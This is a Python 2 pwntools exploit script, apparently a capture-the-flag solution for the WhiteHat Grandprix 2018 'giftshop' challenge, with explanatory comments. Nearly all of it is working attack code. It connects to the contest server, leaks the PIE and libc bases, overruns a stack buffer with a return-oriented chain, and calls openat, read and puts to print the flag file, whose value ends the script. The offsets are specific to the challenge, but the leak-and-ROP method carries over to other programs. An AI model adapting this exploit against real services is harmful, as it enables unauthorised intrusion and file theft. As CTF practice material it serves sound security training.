WhiteHat Grandprix 2018 - ForPlayer Solution
from pwn import * | |
# WhiteHat Grandprix 2018 "giftshop" (ForPlayer) CTF solution, Python 2
# (print statements, str.encode('hex')), built on pwntools.
#
# Structure, as visible below: the service prints an address that is used to
# recover the PIE base; a menu input ("1\x00" + 22 filler bytes) is followed by
# a ROP chain, so the handler presumably overruns a stack buffer at that point.
# Stage 1 calls puts(puts@GOT) to leak a libc pointer and returns to main;
# stage 2 repeats the setup and chains libc openat/read with the binary's
# puts/exit to print the flag file.  Every offset in this file is specific to
# this challenge binary and the remote libc build (the binary was PIE, which is
# why nothing works without the leak) -- none of them carry over elsewhere.
#r = process("/home/gift/run.sh") | |
r = remote("pwn01.grandprix.whitehatvn.com", 26129) | |
bin = ELF('./giftshop') | |
# Gadget offsets inside the PIE image; added to piebase before use.
poprdi = 0x000000000000225f # pop rdi ; ret | |
poprsi = 0x0000000000002261 # pop rsi ; ret | |
poprdx = 0x0000000000002265 # pop rdx ; ret | |
# PLT/GOT slots resolved from the local copy of the binary (image-relative).
putsplt = bin.plt['puts'] | |
putsgot = bin.got['puts'] | |
exitplt = bin.plt['exit'] | |
main = 0xda0 | |
pers = 0x0000000024EE | |
# Writable scratch area used as the read() destination in stage 2.
bss = 0x203206 | |
# Not referenced below (nor is `pers`); left over from exploration.
stdin = 0x00203110 | |
#context.log_level = 'debug' | |
# --- stage 1: recover PIE base from the address the service prints ---------
r.recvuntil("here !") | |
r.recvline() | |
leak = int(r.recvline().strip(), 16) | |
print hex(leak) | |
# 0x2030d8 is presumably the image offset of whatever the service leaks -- it
# is a fixed delta for this binary, not derived here.
piebase = leak - 0x2030d8 | |
print "piebase: " + hex(piebase) | |
# The two prompts get the same answer: "q" followed by a NUL, then a path.
# Presumably the NUL terminates the answer the program checks while the path
# stays in memory (see the 0x203122 note in stage 2) -- TODO confirm.
r.recvuntil("??") | |
r.sendline("q\x00/home/gift/../gift/flag.txt") | |
r.recvuntil("zz:") | |
r.sendline("q\x00/home/gift/../gift/flag.txt") | |
r.recvuntil("choice:") | |
print hex(poprdi+piebase) | |
print hex(putsgot+piebase) | |
print hex(putsplt+piebase) | |
# Chain: puts(puts@GOT) -> main.  Printing the GOT entry leaks the resolved
# libc address of puts; returning to main lets the program be driven a
# second time for stage 2.
r.sendline("1\x00" + "AAAABBBBCCCCDDDDEEEEFF" + p64(poprdi + piebase) + p64(putsgot + piebase) + p64(putsplt + piebase) + p64(main + piebase)) | |
r.recvline() | |
# puts emits the raw pointer bytes up to the first NUL (little-endian), so
# the line is reversed before hex-decoding to get the numeric value.
libc = r.recvline()[:-1] | |
print "libc leak:" + libc[::-1].encode('hex') | |
# 0x6f690 is presumably puts' offset in the remote libc -- confirm against the
# target's libc build if reusing.
libc = int(libc[::-1].encode("hex"), 16) - 0x6f690 | |
print "libc: " + hex(libc) | |
# --- stage 2: same setup again after the return to main ---------------------
r.recvuntil("here !") | |
r.recvline() | |
leak = int(r.recvline().strip(), 16) | |
print hex(leak) | |
piebase = leak - 0x2030d8 | |
print "piebase: " + hex(piebase) | |
r.recvuntil("??") | |
r.sendline("q\x00/home/gift/../gift/flag.txt") | |
r.recvuntil("zz:") | |
# Second answer carries an explicit trailing NUL so the path is terminated.
r.sendline("q\x00/home/gift/../gift/flag.txt\x00") | |
r.recvuntil("choice:") | |
# libc-relative offsets of open/openat/read for the remote libc build;
# `openoff` is only printed, the chain uses openat.
openoff = 0xf7030 | |
openatoff = 0xf70f0 | |
readoff = 0xf7250 | |
#string loc = 0x203122 | |
print hex(libc + openoff) | |
print hex(libc + readoff) | |
# openat(0x1234, piebase + 0x203122, 0): the dirfd is ignored for an absolute
# path, so 0x1234 is a placeholder; 0x203122 is presumably where the path
# sent above ends up in the binary's image (see the commented "string loc").
ropchain = [poprdi + piebase, 0x1234, poprsi + piebase, 0x203122 + piebase, poprdx + piebase, 0, openatoff + libc] | |
# read(4, bss, 200): assumes the descriptor returned by openat is 4 -- TODO
# confirm; nothing here checks the return value.
ropchain += [poprdi + piebase, 4, poprsi + piebase, bss + piebase, poprdx + piebase, 200, readoff + libc] | |
# puts(bss) prints what was read, then exit() ends the process cleanly.
ropchain += [poprdi + piebase, bss + piebase, putsplt + piebase, exitplt + piebase] | |
# Serialize the chain as consecutive 8-byte little-endian words.
payload = "" | |
for i in ropchain: | |
payload += p64(i) | |
print repr(payload) | |
r.sendline("1\x00" + "AAAABBBBCCCCDDDDEEEEFF" + payload) | |
r.interactive() | |
# WhiteHat{aeb7656b7a397a01c0d9d19fba3a81352e9b21aa} |